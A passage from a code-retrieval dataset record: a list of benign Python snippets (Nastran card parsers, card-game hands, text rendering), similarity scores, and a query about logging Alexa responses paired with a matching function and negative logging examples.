g1_thru == 'THRU' and integer_or_blank(card, 8, 'eid2'):\n # alternate form\n eid2 = integer(card, 8, 'eid2')\n if eid2:\n eids = list(unique(\n expand_thru([eid, 'THRU', eid2], set_fields=False, sort_fields=False)\n ))\n g1 = None\n g34 = None\n else:\n # standard form\n eids = [eid]\n g1 = integer_or_blank(card, 7, 'g1')\n g34 = integer_or_blank(card, 8, 'g34')\n\n # If both (CID, N1, n2, N3) and LDIR are blank, then the default is\n # LDIR=NORM.\n cid = integer_or_blank(card, 9, 'cid')\n n1 = double_or_blank(card, 10, 'N1', 0.)\n n2 = double_or_blank(card, 11, 'N2', 0.)\n n3 = double_or_blank(card, 12, 'N3', 0.)\n nvector = array([n1, n2, n3])\n\n surf_or_line = string_or_blank(card, 13, 'sorl', 'SURF')\n line_load_dir = string_or_blank(card, 14, 'ldir', 'NORM')\n assert len(card) <= 15, f'len(PLOAD4 card) = {len(card):d}\\ncard={card}'\n return PLOAD4(sid, eids, pressures, g1, g34, cid, nvector,\n surf_or_line, line_load_dir, comment=comment)", "def add_card(self, card):\n self.unpack_cards()\n card.dealt(self)\n self.card_list.append(card)\n self.num_cards.set(self.num_cards.get()+1)\n # pretty inefficient to unpack and pack on every card addition...\n self.pack_cards() \n if self.empty.get() is True:\n self.empty.set(False)\n self.toggle_empty_hand()", "def add_card(cls, card, comment=''):\n sid = integer(card, 1, 'sid')\n eid = integer(card, 2, 'eid')\n load_type = string(card, 3, 'Type (\"%s\")' % '\", \"'.join(cls.valid_types))\n scale = string(card, 4, 'scale (\"%s\")' % '\", \"'.join(cls.valid_scales))\n x1 = double(card, 5, 'x1')\n p1 = double(card, 6, 'p1')\n x2 = double_or_blank(card, 7, 'x2', x1)\n p2 = double_or_blank(card, 8, 'p2', p1)\n assert len(card) <= 9, f'len(PLOAD1 card) = {len(card):d}\\ncard={card}'\n return PLOAD1(sid, eid, load_type, scale, x1, p1, x2, p2, comment=comment)", "def add_card(self, card):\r\n\t\tself.cards.append(card)\r\n\t\tself.__update_values()\r\n\t\tself.__update_valid_moves()", "def display_eng_word():\n en_word = rand_word[\"English\"] # Grabs the English word of the current word\n canvas.itemconfig(card_title, text=\"English\", fill=\"white\") # Change screen title to English\n canvas.itemconfig(card_word, text=en_word, fill=\"white\") # Display the english word of the current displaying french word\n canvas.itemconfig(canvas_image, image=back_image) # Changes the background", "def add_card(self, card):\n \n self.hand.append(card)\n \n return None", "def asm(self, text):\n self.text.append(text)", "def add_card(cls, card, comment=''):\n eid = integer(card, 1, 'eid')\n pid = integer_or_blank(card, 2, 'pid', eid)\n ga = integer(card, 3, 'ga')\n gb = integer(card, 4, 'gb')\n x1_g0 = integer_double_or_blank(card, 5, 'x1_g0', 0.0)\n if isinstance(x1_g0, integer_types):\n g0 = x1_g0\n x = None\n elif isinstance(x1_g0, float):\n g0 = None\n x = np.array([double_or_blank(card, 5, 'x1', 0.0),\n double_or_blank(card, 6, 'x2', 0.0),\n double_or_blank(card, 7, 'x3', 0.0)], dtype='float64')\n if norm(x) == 0.0:\n msg = 'G0 vector defining plane 1 is not defined.\\n'\n msg += 'G0 = %s\\n' % g0\n msg += 'X = %s\\n' % x\n raise RuntimeError(msg)\n else:\n raise ValueError('invalid x1Go=%r on CBEND' % x1_g0)\n geom = integer(card, 8, 'geom')\n\n assert len(card) == 9, f'len(CBEND card) = {len(card):d}\\ncard={card}'\n return CBEND(eid, pid, [ga, gb], g0, x, geom, comment=comment)", "def define_content(self, html):\n self.html_template(html, lang=\"en\")\n self.add_language(\"en\")", "def addData(self,content):\n\tself.characters(content)", "def add_card(self, added_cards):\n\n self.hand[:0] = added_cards", "def add_card(cls, card, comment=''):\n sid = integer(card, 1, 'sid')\n pressure = double(card, 2, 'pressure')\n nodes = [integer(card, 3, 'n1'),\n integer(card, 4, 'n2'),\n integer(card, 5, 'n3')]\n n4 = integer_or_blank(card, 6, 'n4', 0)\n if n4:\n nodes.append(n4)\n assert len(card) <= 7, f'len(PLOAD card) = {len(card):d}\\ncard={card}'\n return PLOAD(sid, pressure, nodes, comment=comment)", "def add_cards(self, cards):\n self.get_cards().extend(cards)", "def add_card(cls, card, comment=''):\n sid = integer(card, 1, 'sid')\n cid = integer_or_blank(card, 2, 'cid', 0)\n scale = double(card, 3, 'scale')\n N = array([double_or_blank(card, 4, 'N1', 0.0),\n double_or_blank(card, 5, 'N2', 0.0),\n double_or_blank(card, 6, 'N3', 0.0)])\n mb = integer_or_blank(card, 7, 'mb', 0)\n assert len(card) <= 8, f'len(GRAV card) = {len(card):d}\\ncard={card}'\n return GRAV(sid, scale, N, cid=cid, mb=mb, comment=comment)", "def Add_Text( self, th ):\r\n self.text_handle = th", "def add(self, text, account=None, images=()):\n # type: (Text, Text, Tuple[Union[cgtwq.model.ImageInfo, Text,], ...]) -> ...\n\n account = account or get_account_id(self.select.token)\n\n # TODO: Refactor arguments at next major version.\n message = Message.load(text)\n message.images += images\n\n text_key = \"dom_text\"\n id_key = \"#link_id\"\n from_account_id_key = \"from_account_id\"\n if compat.api_level() == compat.API_LEVEL_5_2:\n text_key = \"text\"\n id_key = \"#task_id\"\n from_account_id_key = \"#from_account_id\"\n\n select = self.select\n select.call(\n \"c_note\",\n \"create\",\n field_data_array={\n \"module\": select.module.name,\n \"module_type\": select.module.module_type,\n id_key: \",\".join(select),\n text_key: message.api_payload(),\n from_account_id_key: account,\n },\n )", "async def translate(self, ctx: commands.Context, *, text: str):\n # Check for cooldown\n await self.check_cooldown(ctx)\n\n # Create new translation context and contact API\n context = contexts.create_translation_context(self.bot.config.data_path, text=text)\n async with ctx.typing():\n result = await utils.create_completion_result_from_context(self.bot.loop, context)\n await ctx.send(\"```\"+result[:1993]+\"```\")", "def post(self):\n schema = TextSchema()\n text = schema.load(request.json)\n\n if not self.is_english(text.content):\n return {'msg': 'Please provide text in english language'}, 403\n\n db.session.add(text)\n\n try:\n db.session.commit()\n except exc.IntegrityError:\n return {'msg': 'duplicate entries'}, 403\n\n return {'msg': 'text created', 'text': schema.dump(text)}, 201", "def append(self, card):\n self.cards.append(card)", "def addText(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads\r\n pass", "def add_chapter(self, text: str) -> None:\n\n tag = r'\\chapter{%s}' % (text)\n self.doc = self.doc + tag", "def addPublication():\n preloaded = [\n {\"description\": \"bortaS <b>bIr</b> jablu'DI' reH QaQqu' nay'!\"},\n {\"language\": \"en\"},\n {\"country\": \"usa\"}\n ]\n return render_template(\"addPublication.html\", msg=\"\", preloaded=preloaded)", "def handle_data(self, text):\n self.pieces.append(text)", "def add_content(self, addition):\n self.content = self.content + addition", "def add_text(self, text, doc=None):\n if doc is None:\n doc = self.doc\n\n attributes = dict(height=13, width=800, align=None,\n style={'width': '800px',\n 'font-size': '100%',\n 'font-style': 'italic',\n 'font-weight': 'lighter',\n 'color': 'darkgrey',\n 'text-align': 'center'})\n doc.add_root(Div(text=f\"<b>{text}</b>\", **attributes))\n return doc", "def add_content(self, content):\n self._content = '{}{}'.format(self._content, content)", "def add_card(cls, card, comment: str=''):\n sid = integer(card, 1, 'sid')\n pressure = double(card, 2, 'p')\n\n if integer_string_or_blank(card, 4, 'THRU') == 'THRU':\n e1 = integer(card, 3, 'Element1')\n e2 = integer(card, 5, 'Element1')\n eids = [i for i in range(e1, e2 + 1)]\n assert len(card) == 6, f'len(PLOAD2 card) = {len(card):d}\\ncard={card}'\n else:\n eids = fields(integer, card, 'eid', i=3, j=len(card))\n assert len(eids) <= 6, f'A maximum of 6 eids may be on the PLOAD2; n={len(eids)}\\ncard={card}'\n return PLOAD2(sid, pressure, eids, comment=comment)", "def add_card(cls, card, comment=''):\n eid = integer(card, 1, 'eid')\n pid = integer_or_blank(card, 2, 'pid', eid)\n ga = integer(card, 3, 'ga')\n gb = integer(card, 4, 'gb')\n gc = integer_or_blank(card, 5, 'gc')\n\n # card, eid, x1_default, x2_default, x3_default\n x, g0 = init_x_g0_cbeam3(card, eid, 0., 0., 0.)\n wa = np.array([double_or_blank(card, 9, 'w1a', 0.0),\n double_or_blank(card, 10, 'w2a', 0.0),\n double_or_blank(card, 11, 'w3a', 0.0)], dtype='float64')\n\n wb = np.array([double_or_blank(card, 12, 'w1b', 0.0),\n double_or_blank(card, 13, 'w2b', 0.0),\n double_or_blank(card, 14, 'w3b', 0.0)], dtype='float64')\n\n wc = np.array([double_or_blank(card, 15, 'w1c', 0.0),\n double_or_blank(card, 16, 'w2c', 0.0),\n double_or_blank(card, 17, 'w3c', 0.0)], dtype='float64')\n\n tw = np.array([double_or_blank(card, 18, 'twa', 0.),\n double_or_blank(card, 19, 'twb', 0.),\n double_or_blank(card, 20, 'twc', 0.)], dtype='float64')\n\n # TODO: what are the defaults?\n s = np.array([integer_or_blank(card, 21, 'sa', -1),\n integer_or_blank(card, 22, 'sb', -1),\n integer_or_blank(card, 23, 'sc', -1)], dtype='int32')\n assert len(card) <= 24, f'len(CBEAM3 card) = {len(card):d}\\ncard={card}'\n return CBEAM3(eid, pid, [ga, gb, gc], x, g0,\n wa=wa, wb=wb, wc=wc, tw=tw, s=s, comment=comment)", "def set_description(self, text, lang=0):\n self.localized_strings[lang] = text", "def add_text(parent, text, transform='', text_height=12, color='#000000'):\n text_style = {'font-size': '%dpx' % text_height, 'font-style': 'normal', 'font-weight': 'normal',\n 'fill': color, 'font-family': 'Bitstream Vera Sans,sans-serif',\n 'text-anchor': 'middle', 'text-align': 'center'}\n\n text_attribs = {\n inkex.addNS('label', 'inkscape'): 'Annotation',\n 'style': simplestyle.formatStyle(text_style)\n }\n if transform != \"translate(0,0)\":\n text_attribs['transform'] = transform\n text_node = inkex.etree.SubElement(parent, inkex.addNS('text', 'svg'), text_attribs)\n text_node.text = text", "def process_text(self, text, language):", "def add_card(cls, card, comment=''):\n sid = integer(card, 1, 'sid')\n cid = integer_or_blank(card, 2, 'cid', 0)\n N = [double_or_blank(card, 3, 'N1', 0.0),\n double_or_blank(card, 4, 'N2', 0.0),\n double_or_blank(card, 5, 'N3', 0.0)]\n direction = string(card, 6, 'dir')\n\n i = 9\n locs = []\n vals = []\n j = 0\n nfields = len(card)\n while i < nfields:\n #raise NotImplementedError('ACCEL-line 2')\n loc = double(card, i, 'loc%i' % j)\n val = double(card, i, 'loc%i' % j)\n #print('i=%s j=%s len=%s loc=%s val=%s' % (i, j, len(card), loc, val))\n locs.append(loc)\n vals.append(val)\n j += 1\n i += 2\n return ACCEL(sid, N, direction, locs, vals, cid=cid, comment=comment)", "def insert_text(self, text):\n self.str += text", "def add_item(self, text):\n\t\tnew_todo = self.todolist.add(text)\n\t\tself.store.append((new_todo.id, text))", "def insert_new(self, card):\n\n handlers = {\n 'flyer': (self.prepare_flyer, 'card_ordinary'),\n 'test': (self.prepare_proxy('test'), 'card_ordinary'),\n 'once': (self.prepare_proxy('once'), 'card_ordinary'),\n 'abonement': (self.prepare_abonement, 'card_ordinary'),\n }\n slug = card['slug']\n handle, card_type = handlers[slug]\n info = handle(card) # here is a dictionary\n\n card_desc_list = self.static[card_type]\n search_result = filter(lambda a: a['slug'] == slug, card_desc_list)\n if len(search_result) != 1:\n raise Exception('Check card type list')\n this_card = search_result[0]\n\n record = []\n\n for name, delegate, title, action, use_static in MODEL_MAP_RAW:\n value = info.get(name, None)\n if use_static:\n if value and name == 'price_category':\n value = filter(\n lambda a: a['id'] == value,\n this_card['price_categories']\n )[0]\n if value and name == 'discount':\n value = filter(\n lambda a: a['id'] == value,\n self.static['discounts']\n )[0]\n record.append(value)\n record.append(0) # this record is not registered in DB yet\n\n self.storage.insert(0, record)\n self.emit(SIGNAL('rowsInserted(QModelIndex, int, int)'),\n QModelIndex(), 1, 1)", "def trelloAddCard(self, args): \n\n listID = args[\"threadID\"] \n cardName = args[\"message\"] \n\n l = self.getListByID(listID) \n l.append(cardName) # Check this ", "def __init__(self, text: str) -> None:\n\n super().__init__()\n\n self._width = 0\n self._opacity = 255\n self._sprites = []\n self._text = text\n for index, c in enumerate(text):\n y_offset = 0\n if c in Text.characters:\n if Text.characters[c][1]:\n y_offset = 2\n c = Text.characters[c][0]\n elif c.isupper():\n c = c.lower() + \"_maj\"\n self._sprites.append(\n cocos.sprite.Sprite(pyglet.image.load(PATH + '/assets/img/common/font/{0}.png'.format(c))))\n self._sprites[index].position = self._width, (self._sprites[index].height - 11) / 2 - y_offset\n self._width += self._sprites[index].width\n self.add(self._sprites[index])", "def add_text(self, x, y, text):\n elem = TextElement()\n elem.text = str(text)\n elem.style = {\n 'font-size': self.svg.unittouu('10pt'),\n 'fill-opacity': '1.0',\n 'stroke': 'none',\n 'font-weight': 'normal',\n 'font-style': 'normal' }\n elem.update(x=str(x), y=str(y))\n return elem", "def add_card_to_hand(self, card):\n self.hand.append(card)", "def set_content(self, text):\n img, size = self._render_as_image(text)\n # Modify the Drawable attributes based on text attributes\n self.image = img\n self.rect.size = size", "def add_text(text, x, y, rgb = [0, 0, 0], font_name = 'times new roman', size = 32, bold = False, italics = False, merged = False, slot = 0):\r\n \r\n font = pygame.font.SysFont(font_name, size, bold, italics)\r\n text = font.render(text, 1, rgb)\r\n \r\n if slot not in __g.keys():\r\n raise IndexError('No image loaded at slot %i' %(slot))\r\n \r\n surface = __g.values()[slot]\r\n if merged:\r\n surface.image.blit(text, (x, y))\r\n else:\r\n surface.text_add.append([x, y, text])", "def draw_text(\n self,\n text: str,\n transform: Matrix44,\n properties: Properties,\n cap_height: float,\n ) -> None:\n raise NotImplementedError", "def create(self, section, text):\n payload = {}\n payload['introeditor[text]'] = text\n return self._create(section, payload)", "def add_text(self, tag, text_string, global_step=None):\n if text_string is None:\n # Visdom doesn't support tags, write the tag as the text_string\n text_string = tag\n self.vis.text(text_string)", "def addCard(self, flag, player, card):\n self.board.flags[flag].add_card(player, card)\n self.engine.output_handler.play_action(player, card, flag + 1)\n self.latestPlayer = player", "def insert_cards(self, cards: List[str], deck: str) -> None:\n deck = self.collection.decks.byName(deck)\n if deck is None:\n raise ValueError(\"Deck doesn't exist\")\n\n for card in cards:\n note = self._create_card(self.DEFAULT_MODEL)\n note.model()['did'] = deck['id'] # Make card's deck be `deck`\n note.fields[0] = card # fields=[content, tags]\n self.collection.addNote(note)\n # Card IDs are timestamps (integer milliseconds). Avoid collisions\n # by staggering insertion time\n time.sleep(0.002)\n \n self._remove_duplicates()\n self.collection.save() # Commit to database", "def add_card(cls, card, comment=''):\n eid = integer(card, 1, 'eid')\n scale = string(card, 2, 'scale')\n x1_npoints = integer_or_double(card, 3, 'x1/npoints')\n if isinstance(x1_npoints, integer_types):\n npoints = x1_npoints\n assert 0 < npoints < 7, 'CBARAO npoints=%r must be 1-6' % npoints\n x1 = double(card, 4, 'x1')\n delta_x = double(card, 5, 'delta_x')\n x = np.linspace(x1, x1 + delta_x * (npoints-1), num=npoints)\n assert len(x) == npoints, x\n else:\n x = [\n x1_npoints,\n double_or_blank(card, 4, 'x2'),\n double_or_blank(card, 5, 'x3'),\n double_or_blank(card, 6, 'x4'),\n double_or_blank(card, 7, 'x5'),\n double_or_blank(card, 8, 'x6'),\n ]\n x = [xi for xi in x if xi is not None]\n assert len(card) <= 9, f'len(CBARAO card) = {len(card):d}\\ncard={card}'\n return CBARAO(eid, scale, x, comment=comment)", "def addContent(self, text):\n text = _coercedUnicode(text)\n c = self.children\n if len(c) > 0 and isinstance(c[-1], unicode):\n c[-1] = c[-1] + text\n else:\n c.append(text)\n return c[-1]", "def add_msg(pos, msg):\n return OnscreenText(text=msg, style=1, fg=(1, 1, 1, 1), shadow=(0, 0, 0, 1),\n parent=base.a2dTopLeft, align=TextNode.ALeft,\n pos=(0.08, -pos - 0.04), scale=.05)", "def draw_card(self,card):\n self.hand.append(card)", "def add_cloud_plugin_content(self, content):", "def add_text(article):\n raw_html = smart_wget(article['url'])\n article['text'] = _get_text(raw_html)\n return article", "def add_chapter(self, xhtml, linear=\"yes\"):\n assert isinstance(xhtml, XHTMLFile)\n\n src = \"%s/%s\" % (self.TEXT, xhtml.filename)\n self.opf.add_manifest(xhtml.uid, src, xhtml.media_type)\n self.opf.add_spine(xhtml.uid, linear)\n\n self.ncx.add_item(xhtml.uid, xhtml.title, src)\n\n filename = os.path.join(\"OEBPS\", self.TEXT, xhtml.filename)\n self.zip.writestr(filename, str(xhtml))", "def insert_card(db_conn, data):\n\n schema = get_card_schema(data)\n if not schema:\n return data, [{\n 'name': 'kind',\n 'message': 'Missing card kind.',\n }]\n card, errors = insert_entity(schema, db_conn, data)\n if not errors:\n save_entity_to_es('card', deliver_card(card, access='view'))\n return card, errors", "def add(self, credit_card: CreditCard):\n self._iframe_fill(\n \"braintree-hosted-field-number\", self.cc_number, credit_card.number)\n self._iframe_fill(\n \"braintree-hosted-field-cvv\", self.cvv, credit_card.cvc)\n self._iframe_fill(\n \"braintree-hosted-field-expirationDate\", self.expiration,\n f\"{credit_card.exp_month:02d}{credit_card.exp_year}\")", "def create(self, name):\n # TODO(multilang): it must receive information about both languages.\n cardlist = List(name=name)\n self.session.add(cardlist)\n self.session.commit()\n return domain.List(id=cardlist.id, name=cardlist.name)", "def add_card(self, card):\n if not isinstance(card, Card):\n raise TypeError(\"'card' must be a card object.\")\n # append new card to list of cards in the hand\n self.cards.append(card)\n self.total = card + self.total\n # aces require a little more work\n if card.rank == 14:\n self.soft = True\n self.num_aces += 1\n self.num_hard_aces += 1\n # account for soft hands\n if self.total > 21 and self.soft:\n self.total -= 10\n self.num_hard_aces -= 1\n self.soft = False\n # catch the edge case where you're delt 12+ aces\n if self.total > 21:\n self.total -= 10\n self.num_hard_aces -= 1\n self.soft = False\n if self.num_hard_aces > 0:\n self.soft = True\n if self.total > 21:\n self.bust = True", "def add_blog(self, text):\n self.blog.add_blog(text)\n self.refresh()", "def add_text(self, text, color, pos, font):\n text = font.render(text, True, color)\n text_rec = text.get_rect(center=pos)\n self.window.blit(text, text_rec)", "def add_file(self, filename):\n f = open(filename, 'r', encoding='utf8', errors='ignore')\n text = f.read()\n f.close()\n self.add_string(text)", "def create_card(self, trello, name):\n\n trello_card = trello.create_card(self._list_data, name)\n new_card = Card(trello, self, trello_card)\n self._cards.append(new_card)\n\n return new_card", "def fill_cards_markup(self, script_manager):\n for card in self.cards:\n card.fill_markup(self._trello, script_manager)" ]
[ "0.61664975", "0.6056356", "0.6032832", "0.5922822", "0.5634238", "0.5634238", "0.5634238", "0.5634238", "0.5613592", "0.5592778", "0.5525272", "0.54307914", "0.53953665", "0.5383566", "0.53688663", "0.53124416", "0.52927655", "0.52916425", "0.5291438", "0.52559805", "0.52509606", "0.5248879", "0.5228947", "0.5227708", "0.52236855", "0.51972026", "0.5187254", "0.5162527", "0.51565605", "0.51430494", "0.51423275", "0.5140959", "0.51349455", "0.5123339", "0.5111939", "0.5108536", "0.5076445", "0.5073518", "0.50480217", "0.5023039", "0.50161606", "0.50112474", "0.4993653", "0.49922442", "0.49700442", "0.49154446", "0.49154443", "0.4908235", "0.48993552", "0.48984635", "0.48937374", "0.48936898", "0.4869215", "0.48651975", "0.48491514", "0.48454666", "0.48398057", "0.48326546", "0.47864896", "0.4775855", "0.4774372", "0.47719663", "0.47553638", "0.47487384", "0.472924", "0.47291243", "0.47288162", "0.4728807", "0.47276568", "0.4721579", "0.47120976", "0.4709705", "0.46969357", "0.4696275", "0.46906072", "0.4687777", "0.46875238", "0.46811587", "0.468036", "0.46745625", "0.46737492", "0.46680686", "0.46538126", "0.46465948", "0.46448052", "0.46445715", "0.46402764", "0.46400982", "0.46318278", "0.4629734", "0.46170175", "0.46129873", "0.4608926", "0.45873144", "0.45846382", "0.4580307", "0.4580283", "0.45801643" ]
0.622388
2
Log response from alexa service.
def log_response(handler_input, response): # type: (HandlerInput, Response) -> None print("Alexa Response: {}\n".format(response))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def on_response(self, response):\n log.debug(\"Received response: %s\", response)", "def on_a(self):\r\n self.log()", "def log_response(task_request, response):\n msg = \"{0.status_code} {0.reason} for {0.url}: {0.content}\".format(response)\n log_info(task_request, msg)", "def __call__(self, request):\n request.start_time = time.time()\n\n response = self.get_response(request)\n\n log_data = self.extract_log_info(request=request, response=response)\n logger.info(log_data)\n\n return response", "def logging_response(response, status_code=200):\n if status_code != 200:\n log = app.logger.error\n else:\n log = app.logger.info\n log(response)\n return Response(response, status_code)", "def access(self, resp, req, environ, request_time):\n if not (self.cfg.accesslog or self.cfg.logconfig or self.cfg.syslog):\n return\n\n msg = self.make_access_message(resp, req, environ, request_time)\n try:\n self.access_log.info(msg)\n except:\n self.error(traceback.format_exc())", "def alexa_handler(event, context, env_vars=None):\n\n if env_vars is None: # pragma: no cover\n env_vars = os.environ\n\n setup_logging()\n\n # If calling from a scheduled event, this is only a 'warmup' call\n if event.get('detail-type') == 'Scheduled Event':\n logging.info('Warmup only, returning early')\n return\n\n logging.debug('Event:\\n%s', json.dumps(event))\n\n latitude, longitude = get_geo_coordinates(event=event)\n response = query_dark_sky(latitude, longitude)\n weather = parse_weather(response)\n to_speak = build_text_to_speak(weather)\n\n return {\n 'version': '1.0',\n 'response': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': to_speak\n }\n }\n }", "def after_request(response):\n # TODO: Send log reports to a monitor service such as DataDog?\n return response", "def handle_response(self, response):\n self.__log(f'Received response from server. The code is: \"{response}\"')\n if not response.status_code == 200:\n self.handle_api_error(response)\n self.to_output_file(response.text)", "def log(self, request, response, time):\n try:\n fmt_info = self.colorize_atoms(\n self._format_line(request, response, time)\n )\n\n values = list()\n extra = dict()\n for key, value in fmt_info:\n values.append(value)\n\n if key.__class__ is str:\n extra[key] = value\n else:\n extra[key[0]] = {key[1]: value}\n\n self.logger.info(\n self.colorize_msg(\n str(response.status), self._log_format % tuple(values),\n ),\n extra=extra\n )\n\n except Exception:\n self.logger.exception(\"Error in logging\")", "def after_request(response):\n logger = logging.getLogger(\"app.access\")\n logger.info(\n \"%s [%s] %s %s %s %s %s %s %s\",\n request.remote_addr,\n dt.utcnow().strftime(\"%d/%b/%Y:%H:%M:%S.%f\")[:-3],\n request.method,\n request.path,\n request.scheme,\n response.status,\n response.content_length,\n request.referrer,\n request.user_agent,\n )\n return response", "def after(response):\n app.logger.info(\"Local Timestamp: {}\".format(str(datetime.now())))\n app.logger.info(\"Response Code: {}\".format(response.status))\n app.logger.info(\"Response Headers:{}\\n{}\\n{}\".format(\"-\"*43,str(response.headers)[:-3], \"-\"*60))\n # hide password from logs\n body = response.json\n if type(body) is dict and \"password\" in body:\n body['password'] = \"[provided]\"\n if type(body) is dict and \"access_token\" in body:\n body['access_token'] = \"[provided]\"\n app.logger.info(\"Response Body: {}\\n\".format(body))\n return response", "def log_requests(response):\n ts = strftime('[%Y-%b-%d %H:%M-%S]')\n\n logger.info('Flask: {0} {1} {2} {3} {4} {5}'.\n format(ts, request.remote_addr, request.method, request.scheme, request.full_path, response.status))\n\n return response", "def logResponse(url=None,respCode=None,error=None,elapsed=None):\n if respCode <> 200:\n logging.error('URL: %s, Response: %s, Error: %s, Elapsed: %s' % (url, respCode, error,elapsed))\n else:\n logging.info('URL: %s, Response: %s, OK: %s, Elapsed: %s' % (url, respCode,error,elapsed))", "def log_request_response(task_request, response):\n log_request(task_request, response.request)\n log_response(task_request, response)", "def web_logger(response):\n LOG.info('%s %s %s %s', flask.request.remote_addr, flask.request.method,\n flask.request.full_path, response.status)\n return response", "def test_response_in_logs(self):\n operator = SimpleHttpOperator(\n task_id='test_HTTP_op',\n method='GET',\n endpoint='/',\n http_conn_id='HTTP_EXAMPLE',\n log_response=True,\n )\n\n with patch.object(operator.log, 'info') as mock_info:\n operator.execute(None)\n mock_info.assert_called_with(AnyStringWith('Example Domain'))", "def _log_request(res: SpamResult) -> None:\n _log.info(f\"requestId=[{request.id}] result=[{res.label}] reason=[{res.reason}]\")", "def access(self, resp, req, environ, request_time):\n if not (self.cfg.accesslog or self.cfg.logconfig or self.cfg.syslog):\n return\n\n atoms = self.atoms(resp, req, environ, request_time)\n\n # wrap atoms:\n # - make sure atoms will be tested properly\n # - if atom doesn't exist replace it by '-'\n safe_atoms = self.atoms_wrapper_class(atoms)\n safe_atoms = self.colorize_atoms(safe_atoms)\n try:\n msg = self.cfg.access_log_format % safe_atoms\n self.access_log.info(self.colorize_msg(atoms['s'], msg))\n except:\n self.error(traceback.format_exc())", "def _log_response(*, log_path: Path, ip_dict: Dict[str, int], response: Response) -> None:\n LOGGER.info(f\"logged request: {response.url}\")\n with log_path.open(mode=\"a\", encoding=\"utf-8\") as f:\n all_responses = [response]\n\n # Poll and wait for operations, if applicable\n is_operation_request = bool(\n re.match(re.compile(\".*/api/versioned/v1/operations/.*\"), response.url)\n )\n is_get_request = response.request.method == \"GET\"\n if is_get_request and is_operation_request:\n wait_resp = _collect_operation_calls(response=response)\n all_responses.extend(wait_resp)\n\n all_json = [_response_to_json(r, ip_dict) for r in all_responses]\n f.writelines([f\"{j}\\n\" for j in all_json])", "def test_get_event_log(event_log_api_setup):\n api_response = event_log_api_setup.get_event_log(\n event_log_id=1,\n )\n logging.getLogger().info(\"%s\", api_response)\n print(f\"{BCOLORS.OKGREEN}OK{BCOLORS.ENDC}\")", "def CallbackLogger(response):\n\tglobal Parent\n\tparsedresponse = json.loads(response)\n\tif parsedresponse[\"status\"] == \"error\":\n\t\tParent.Log(\"OBS Remote\", parsedresponse[\"error\"])\n\treturn", "def log_envoy_output( log, envoy_response ):\n return_dict = {\n u'status_code': envoy_response.status_code, # int\n u'std_out': envoy_response.std_out.decode(u'utf-8'),\n u'std_err': envoy_response.std_err.decode(u'utf-8'),\n u'command': envoy_response.command, # list\n u'history': envoy_response.history # list\n }\n log.info( u'in utils.log_helper.log_envoy_output(); envoy_output, `%s`' % return_dict )\n return return_dict", "def writeResponse(response):", "def service_panel_eventlog(self, call):\r\n _LOGGER.debug(\"alarm control panel received event log request\")\r\n if type(call.data) is dict or str(type(call.data)) == \"<class 'mappingproxy'>\":\r\n code = \"\"\r\n if ATTR_CODE in call.data:\r\n code = call.data[ATTR_CODE]\r\n _LOGGER.debug(\"alarm control panel making event log request\")\r\n ##self.hass.data[DOMAIN][\"command_queue\"].put_nowait([\"eventlog\", self.decode_code(code)])\r\n if self.visprotocol is not None:\r\n self.visprotocol.GetEventLog(self.decode_code(code))\r\n # self.process_command([\"eventlog\", self.decode_code(code)])\r\n else:\r\n _LOGGER.debug(\"alarm control panel not making event log request %s %s\", type(call.data), call.data)", "def emit(self, record):\n log_entry = self.format(record)\n try: \n requests.post(self.host+self.url, log_entry,headers={\"Content-type\": \"application/json\"}).content\n except Exception as e:\n if self.debug:\n print(e)", "def process_say(data):\n logger.info(f\"Said: {data}\")", "def log(response: ClientResponse, body: bytes) -> None: # pragma: no cover\n if response.status in STATUS_OK:\n loggerlevel = logger.info\n # Comments and reviews are too long to be logged for INFO level\n if response.url.name in (\"comments\", \"reviews\"):\n data = response.url.name.upper()\n else:\n data = body.decode(UTF_8_CHARSET)\n else:\n loggerlevel = logger.error\n data = body.decode(UTF_8_CHARSET)\n version = response.version\n if version is not None:\n version = f\"{version.major}.{version.minor}\"\n loggerlevel(\n 'api \"%s %s %s %s\" => %s',\n response.method,\n response.url.raw_path_qs,\n f\"{response.url.scheme.upper()}/{version}\",\n data,\n f\"{response.status}:{response.reason}\",\n )", "def log_request(handler_input):\n # type: (HandlerInput) -> None\n print(\"Alexa Request: {}\\n\".format(handler_input.request_envelope.request))", "def log_request(handler_input):\n # type: (HandlerInput) -> None\n print(\"Alexa Request: {}\\n\".format(handler_input.request_envelope.request))", "def log_request(handler_input):\n # type: (HandlerInput) -> None\n print(\"Alexa Request: {}\\n\".format(handler_input.request_envelope.request))", "def record(self, response):\n self.get_recorder().record(self.request, response)", "def log_result(server, ret_xml):\n\n tree = xml.dom.minidom.parseString(ret_xml)\n\n try:\n message = tree.getElementsByTagName(\"message\")[0].firstChild.nodeValue\n except IndexError:\n logging.warning('XML returned did not contain a message, or was malformed.')\n message = 'Nonexistent'\n\n try:\n meta = tree.getElementsByTagName(\"output\")[0].firstChild.nodeValue\n except IndexError:\n logging.warning('XML returned did not contain a message, or was malformed.')\n meta = 'Nonexistent'\n\n logging.info('Message from NRDP server (%s): %s', server, message)\n logging.info('Meta output from NRDP server (%s): %s', server, meta)", "def test_get_event_logs(event_log_api_setup):\n api_response = event_log_api_setup.get_event_logs(limit=100, offset=0)\n logging.getLogger().info(\"%s\", api_response)\n print(f\"{BCOLORS.OKGREEN}OK{BCOLORS.ENDC}\")", "def respond(self, resp):\n self.push(resp + '\\r\\n')\n self.logline('==> %s' % resp)", "def api_access_logging(\n request,\n endpoint,\n user_input,\n http_response_code,\n custom_error_code,\n api_version\n):\n aal = ApiAccessLog()\n\n aal.date = timezone.now()\n aal.url = request.get_full_path()\n aal.user = request.user\n aal.endpoint = endpoint\n aal.user_input = user_input\n aal.http_response_code = http_response_code\n aal.custom_error_code = custom_error_code\n aal.api_version = api_version\n\n try:\n ip = request.META['REMOTE_ADDR']\n aal.ip = ip\n except KeyError:\n pass\n\n try:\n referer = request.META['HTTP_REFERER']\n aal.referer = referer\n except KeyError:\n pass\n\n try:\n user_agent = request.META['HTTP_USER_AGENT']\n aal.user_agent = user_agent\n except KeyError:\n pass\n\n try:\n remote_host = request.META['REMOTE_HOST']\n aal.remote_host = remote_host\n except KeyError:\n pass\n\n try:\n remote_user = request.META['REMOTE_USER']\n aal.remote_user = remote_user\n except KeyError:\n pass\n\n aal.save()", "def _handle_aprs_error(self, failure):\n\n # Log the error\n logging.error(\"An error occured in the '\"+self._service_id+\"' service while querying the APRS.fi API: \"+\n failure.getErrorMessage())\n\n return None", "def 